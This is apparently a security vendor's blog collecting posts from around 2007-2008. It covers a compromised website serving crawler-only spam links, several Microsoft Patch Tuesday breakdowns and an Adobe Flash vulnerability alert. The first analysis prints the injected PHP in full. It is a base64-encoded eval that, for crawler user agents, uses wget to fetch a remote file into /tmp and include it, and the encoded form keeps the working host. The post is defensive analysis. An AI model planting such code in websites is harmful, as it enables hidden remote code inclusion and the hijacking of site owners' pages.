Return of the ThreatCenter blog

We've been dormant for awhile, but its time to bring back the ThreatCenter blog. eSoft's work in the web security area (identification of malicious/ compromised websites, not securing of web servers) has produced amazing results and huge volumes and its time to share some of these results back to the greater community.

We recently shared some data on a few days worth of fraudulent pharmacy sites with Richart Stiennon who published the information on his ThreatChaos blog (if you haven't read the article, please check it out -- and digg it while you're there). eSoft is seeing these sites at an increasing rate that is fairly staggering.

In our next post, we'll show some of the uglier examples of what we call "pagerank bombs" -- compromised sites used to host hidden links rather than malware.

Compromised Sites Boost PageRank for Porn

A recent analysis of a compromised web site by eSoft's Threat Prevention Team lead to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed, dancescape.tv, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.

The PHP code in question looks like this:


eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));


And resolves to this:


if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");
include("/tmp/getincl.txt");
}


When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:

In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.

This just proves the trends from open compromise to secret compromise. Most malware already tries to hide itself; web site defacements seem also to be a thing of the past as compromised sites are used more and more for relaying attacks and for more stealthy, income earning purposes.

Malware scanning for different gateways

Recently eSoft's Threatlabs found an increase in malware using uPnP - SSDP protocols to find new gateways out of a network. It appears that the effectiveness and increased use of IPS have impacted bot maintainers. Their answer - find another gateway. They are now sending uPnP packets to discover different gateways on their local network. If you are an IT manager, be sure to know where all the exits on your network live.

Microsoft out-of-band release

It's been a long time since our last post, but this weeks activity warrants a post. Yesterday, Microsoft announced a critical update (MS08-067), which occurred out of their normal "Patch Tuesday" cycle. Well it turns out that it was a good idea. The patch closes a security hole in how Windows systems communicate with each other. This vulnerability has the potential to be exploited through worm and spread wildly. It is advised that all users update with Windows systems as soon as possible.

October Patch Tuesday

Microsoft announced there would be 7 advisories on this Patch Tuesday, but we only got 6. It makes you wonder what they held back and why.

That aside, there are a couple of things to know about today's advisories and patches. Here's the breakdown:

• MS07-055 -- Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution
  
  The first thing I thought when seeing this is, "how many people have the Kodak Image Viewer installed?" It turns out, a lot. It was installed on all Windows 2000 machines and is still installed on Windows XP machines that were upgraded from Windows 2000.
  
  This vulnerability is very similar to other extremely critical image handling vulnerabilities that have wreaked havoc on Windows operating systems lately. If you even browse to a folder with a malicious image on a vulnerable machine, the malicious image will be able to execute code on your system. So this impacts anything that displays images from Windows Explorer thumbnails and previews to Internet Explorer and Outlook.
  
  Microsoft does mention that if you have installed Office 2003, the Kodak Image Viewer may have been replaced by a different image viewer.
  
  This is a potentially extremely serious vulnerability, but at this time the details for how to exploit it are almost non-existent and there are no exploits in the wild.


• MS07-056 -- Security Update for Outlook Express and Windows Mail
  
  This relates to how a URL that starts with nntp:// can be used to point a user to a malicious news server (potentially without user interaction if the URL is used as an image source) that overflows memory and potentially executes arbitrary code.
  
  The malicious news server must be custom and has to know how to overflow the handler. There are no examples and no exploits in the wild, but there's enough information for someone to create an exploit without undue difficulty. This is definitely a critical issue.


• MS07-057 -- Cumulative Security Update for Internet Explorer
  
  This is actually three separate vulnerabilities in JavaScript on Internet Explorer from version 5 through 7. All Windows operating systems including Vista are affected. Two of the vulnerabilities use JavaScript tricks to make a person think they've navigated to a particular website when in fact they haven't. This could be exploited by phishers to trick people into thinking they're legitimately at their bank's website (or paypal, or ebay, etc.). There are several publicly available demonstrations showing how to exploit this. Patch immediately.
  
  The other issue in this update is a heap overflow caused when a script starts several download attempts of the same file and then frees the memory for those download attempts.
  
  To alleviate both of these issues, consider using FireFox instead of Internet Explorer and consider trying the NoScript plugin to FireFox.


• MS07-058 -- Vulnerability in RPC Could Allow Denial of Service
  
  This vulnerability reminds me a bit of the old ping of death. A specially crafted windows file-sharing authentication message will cause a computer to spontaneously reboot. Microsoft recommends that people firewall UDP ports 135, 137, 138, and 445, and TCP ports 135, 139, 445, and 593. If you have a gateway firewall, it should block these ports by default. If not, you should strongly consider installing a personal firewall such as ZoneAlarm.


• MS07-059 -- Vulnerability in Windows SharePoint Services 3.0 and Office SharePoint Server 2007 Could Result in Elevation of Privilege Within the SharePoint Site
  
  If you use SharePoint, you should be aware that an authenticated user could increase their privileges through a cross-site scripting (XSS) vulnerability. We don't view this as a critical vulnerability.


• MS07-060 -- Vulnerability in Microsoft Word Could Allow Remote Code Execution
  
  This incorporates 4 separate vulnerabilities in Word for Windows and for Mac that could be exploited by a malicious Word document. The most serious of these issues is a recurrence of an older vulnerability that most security products have some degree of protection for already.

For the moment, the risks are not terribly high, except for potentially harder to detect phishing attacks. However, exploits for the other vulnerabilities could appear at any time, so users are encouraged to update their systems as soon as possible.

September Patch Tuesday relatively minor

Today's Microsoft patch tuesday is one of the mildest in memory (excluding the month that Microsoft skipped patch tuesday altogether, despite a number exploits and known vulnerabilities). Of the four vulnerabilities, the MSN Messenger vulnerability is, in our view, the most serious. Microsoft has only rated it as important because not all versions of MSN Messenger are vulnerable and because users are prompted to upgrade their client when they log on to the MSN Messenger network. Here's the breakdown of each vulnerability:

• MS07-051 -- Vulnerability in Microsoft Agent Could Allow Remote Code Execution
  
  This was the only patch today that Microsoft rated as Critical. Microsoft Agent is the same technology as the Microsoft Office paper clip that used to annoy you. Microsoft touts it as a way to spice up web pages with interactive personalities. However, this is not the first vulnerability in Microsoft Agent, and those who visit web pages that use the agent may be at risk. Microsoft recommends disabling the agent by setting the kill bit on the following CLSIDs:
  
  • D45FD31B-5C6E-11D1-9EC1-00C04FD7081F
  
  
  • F5BE8BD2-7DE6-11D0-91FE-00C04FD701A5
  
  
  • 4BAC124B-78C8-11D1-B9A8-00C04FD97575
  
  
  • D45FD31D-5C6E-11D1-9EC1-00C04FD7081F
  
  
  • D45FD31E-5C6E-11D1-9EC1-00C04FD7081F


• MS07-052 -- Vulnerability in Crystal Reports for Visual Studio Could Allow Remote Code Execution
  
  This vulnerability is rated Important by Microsoft. Only those with Visual Studio are at risk of exploitation of this flaw. If you aren't using Crystal Reports, Microsoft recommends you uninstall it to minimize your exposure to this flaw.


• MS07-053 -- Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege
  
  This is rated Important by Microsoft. Any computer from Windows 2000 through Windows Server 20003 that runs Windows Services for UNIX is susceptible to a local privilege escalation. As this is not remotely exploitable, the eSoft Threat Prevention Team as not analyzed it in depth.


• MS07-054 -- Vulnerability in MSN Messenger and Windows Live Messenger Could Allow Remote Code Execution
  
  This vulnerability is a bit more severe than Microsoft would like you to believe. They have rated this vulnerability as Important, but the eSoft Threat Prevention Team believes it ranks as Critical.
  
  MSN Messenger 6.2, 7.0, 7.5 and Windows Live Messenger 8.0 are all vulnerable. Detailed instructions on exploiting this vulnerability have been released. In order for an attacker to exploit the vulnerability, they must convince their target to accept either a webcam or video chat invitation. If you disable webcam and video chats in MSN Messenger, you are not vulnerable.
  
  The good news with this one is that Windows Live Messenger 8.1, released in January of this year, and users of MSN Messenger 7.0.0820, released "recently" are already protected from this vulnerability. Also, users of Microsoft's messenger products should be prompted to upgrade when they log in to their accounts.
  
  Microsoft recommends blocking Microsoft Messenger traffic until all machines on your network are updated with the latest version of Messenger.

As usual, patch your systems as soon as you can.

Note from the sponsor: eSoft's Intrusion Prevention Softpak can be configured to block all MSN traffic at the gateway. It also blocks websites that use Microsoft Agent as a precaution against the many vulnerabilities in that software.

Threat Level Raised

We're raising the threat level in response to the Adobe vulnerability. At this point, the Threat Level is in a cautionary area. We'll raise it again if we start seeing wide-spread exploitation.

Adobe Flash Browser Plugin High Risk Vulnerability

Yesterday, Adobe announced a vulnerability in its flash player that could be exploited to run arbitrary code. This vulnerability is cross browser and cross platform and the vulnerable software is installed by default on all recent copies of Windows and OS X.

All users who allow flash content in their browsers are at risk.

This morning we saw the first proof-of-concept exploit, which we fully expect to be the tip of the iceberg. Its likely that we'll see mass exploitation in the next few days..

To protect yourself, the best thing to do is to upgrade your flash plugin to 9.0.47.0 or later. If you use FireFox, the NoScript plugin will prevent flash content from running unless you specifically trust the source or grant it temporary permission. NoScript can be annoying, but its an extremely valuable tool in combatting malicious websites.

And, of course, make sure you're running gateway and desktop antivirus and intrusion prevention products that are up-to-date.

We'll keep you posted as we see more.

Note from the sponsor: eSoft's Gateway AntiVirus and Intrusion Prevention Softpaks provide full protection for this vulnerability and provided that protection starting shortly after the announcement of the vulnerability and well before any exploits became public.

Patch Tuesday and Browser 0-days

After a small pause, Threat Center Live is back. We've been very busy at Threat Center building up our honeypots, honeymonkeys, and other systems for finding live malware and exploits in the wild. We've also been busy tracking down and writing signatures for a variety of vulnerabilities. Here's a rundown of the latest news:

The first (as far as I am aware) cross *browser* exploit has been discovered. It affects Windows machines with both Internet Explorer and Firefox installed and uses a trick to cause Internet Explorer (and presumably Outlook, Outlook Express, and other programs that use the same engine as IE) to launch firefox and pass arbitrary javascript code to it in a trusted context -- meaning that applications can be launched without any user interaction. There are some good demonstrations of the exploit here and here, and with these examples I think we can expect malicious exploits as early as today. Note that this is a vulnerability with firefox, but it can only be exploited if someone is using IE despite having firefox installed.

Next in the security roundup from the last couple of days is Microsoft's July Patch Tuesday. This is the first patch tuesday in quite awhile in which there were no fixes for Internet Explorer, Outlook, or Outlook Express. However, our series of patches for Microsoft Office products remains uninterrupted. Here's the breakdown of what you need to know:

• MS07-036 -- Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution
  
  3 vulnerabilities in Excel can allow a malicious Excel file to execute arbitrary code. Although no proof-of-concept exploits have been released to the public, the eSoft Threat Prevention Team was able to reconstruct an exploit from the information in Microsoft's advisory. We believe this is a serious threat. As always, do not open unsolicited file attachments and keep your antivirus signatures up-to-date. eSoft products have zero day protection for this vulnerability when and if exploits start to circulate.


• MS07-037 -- Vulnerability in Microsoft Office Publisher Could Allow Remote Code Execution
  
  Malformed Microsoft Publisher files opened with Publisher 2007 can cause arbitrary code to be executed on a host computer. We recommend blocking .pub files at the gateway to protect against this threat.


• MS07-038 -- Vulnerability in Windows Vista Firewall Could Allow Information Disclosure
  It appears that this vulnerability could allow an attacker to see what services are running on a machine even if those services are firewalled. The vulnerability involves the encapsulation of IPv6 packets inside IPv4 packets. This kind of traffic cannot be blocked at the firewall as it is legitimate traffic. If you don't use IPv6, then you should follow the directions in Microsoft's advisory to disable Teredo. They offer three different ways to block this traffic, the easiest of which is to use the Vista Firewall to block Teredo packets in and out of a machine.


• MS07-039 -- Vulnerability in Windows Active Directory Could Allow Remote Code Execution
  
  Few organizations will allow LDAP access to their Active Directory service through the firewall, so this threat shouldn't be too large for most installations. However, there's always those organizations with non-standard setups and the insider threat. At this point we don't have enough information to give this a full analysis. No public exploits exist.


• MS07-040 -- Vulnerabilities in .NET Framework Could Allow Remote Code Execution
  
  This is in fact three vulnerabilities. Most intrusion prevention systems should have protected against the null-byte vulnerability already in a more generic form. The other two vulnerabilities are a bit more ambiguous as to what programs are vulnerable and how they could be exploited. We're keeping a close eye on this one as a variety of applications use the .NET framework and this could impact many of them.
  
  
• MS07-041 -- Vulnerability in Microsoft Internet Information Services Could Allow Remote Code Execution
  
  This is in fact a rehash of an older known vulnerability in IIS 5.1 on WinXP SP2. It was previously thought to be only a denial of service issue. Many intrusion prevention systems likely already catch attempts to exploit this vulnerability. The exploit is a specially crafted URL, but as the affected software is very outdated there are probably very few vulnerable installations and therefore a low likelihood of someone developing a working exploit that does more than denial of service.

As usual, follow best security practices and patch your systems as soon as possible.

Note from the sponsor: eSoft's Intrusion Prevention and Gateway AntiVirus Softpaks provide protection against all known exploits of the above vulnerabilities and for some of the vlnerabilities, all theoretical exploit vectors.

Microsoft's May Patch Tuesday

Today is again Microsoft Patch Tuesday, the day on which Microsoft announces patches to a series of vulnerabilities and security researchers scramble to learn as much as possible about the vulnerabilities.

Of the announced issues, here are the ones you should be most concerned about:

• MS07-024 and MS07-025 -- Vulnerabilities in Microsoft Office Could Allow Remote Code Execution
  
  4 vulnerabilities affecting mostly Microsoft Word, but also all other applications in the Office suite could be used to compromise your computer if you were to open a malicious Office document. Important to note is that Microsoft Word Viewer and Microsoft Office on the Mac are also vulnerable. It almost goes without saying that you should never open office documents from untrusted sources. And remember, those e-mail forwards from your good friend didn't start with your friend and should be looked at with just as much suspicion as if they came from a total stranger.


• MS07-026 -- Vulnerabilities in Exchange Server Could Allow Remote Code Execution
  If you run Exchange Server to handle your mail, you need to update it now. There are four separate issues including two Denial of Service (specially crafted e-mail will cause the mail server service to hang or quit), one "information leakage" and one remote code execution.
  
  The first concern is the remote code execution. This vulnerability relates to malformed MIME-encoded attachments.
  
  We aren't aware of any exploits at this time and details are still scarce, but that could change very quickly.
  
  The second concern is the "information leakage." E-mails sent with attached HTML files can cause problems for people using Outlook Web Access -- Microsoft's web-based e-mail reader. Essentially, a malicious script could be run in a trusted context and used to steal login credentials, e-mails, and more. This is a cross-site scripting vulnerability and has been shown in similar cases to be a pretty serious breach of security even though it doesn't allow remote code execution.


• MS07-027 and MS07-028 -- Internet Explorer Multiple (Six) Remote Code Execution Vulnerabilities
  
  This is the bread and butter of these Patch Tuesdays: Internet Explorer issues. And despite IE7's enhanced security, it is vulnerable to most of these issues as well. As usual, ActiveX objects are the culprit. Microsoft wanted to allow website designers to be able to write full Windows applications and have them run inside Internet Explorer to create a "rich" web experience. Unfortunately, in doing this, Microsoft made two mistakes: every software component on Microsoft systems can be accessed by a web site. This means that software that wasn't intended to be run in Internet Explorer can be and in many of these cases there are exploitable bugs in the software.
  
  The usual way to deal with this is to explicitly disable specific ActiveX objects by using their "kill bits." Microsoft has a Knowledge Base article with instructions. Also, you can use the Group Policy Editor to set the kill bits on your entire domain. Here are the recommended "kills" from this batch up updates:
  
  

  CLSID	DLL	Comments
  D4FE6227-1288-11D0-9097-00AA004254A0	msdauth.dll	Windows Media component
  BE4191FB-59EF-4825-AEFC-109727951E42	chtskdic.dll
  17E3A1C3-EA8A-4970-AF29-7F54610B1D4C	CAPICOM	Provides encryption capabilities to programmers.
  FBAB033B-CDD0-4C5E-81AB-AEA575CD1338	CAPICOM

  
  
  Note that there are vulnerabilities being patched here that cannot be addressed by setting these kill bits, so your best bet is to upgrade as soon as possible. But still create policies in the Group Policy Editor in case an unpatched machine finds its way onto your network.


• MS07-029 -- Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution
  
  We first mentioned this flaw -- and the exploits circulating in the wild -- on April 13th. The flaw has received a lot of press, but isn't a concern for most people. Only Microsoft-based DNS servers running on the Internet without any kind of firewall on them or between them and the Internet are susceptible to an external attack. And if a worm taking advantage of this exploit got into a local network, it would likely not be able to compromise more than one machine. Despite that disclaimer, its a serious bug that could allow someone to take full control of one of your servers, so this patch is here none too soon. For mitigation details, see our post from above referenced post.

Bottom line: it's time to update your Windows machines using Windows Update or Microsoft Update. And as always, make sure your intrusion prevention, firewall, and anti-virus products are up-to-date.

Note from the sponsor: a combination of eSoft's Firewall, Intrusion Prevention, and Gateway Anti-Virus products will protect customers from all known exploits of today's announced vulnerabilities.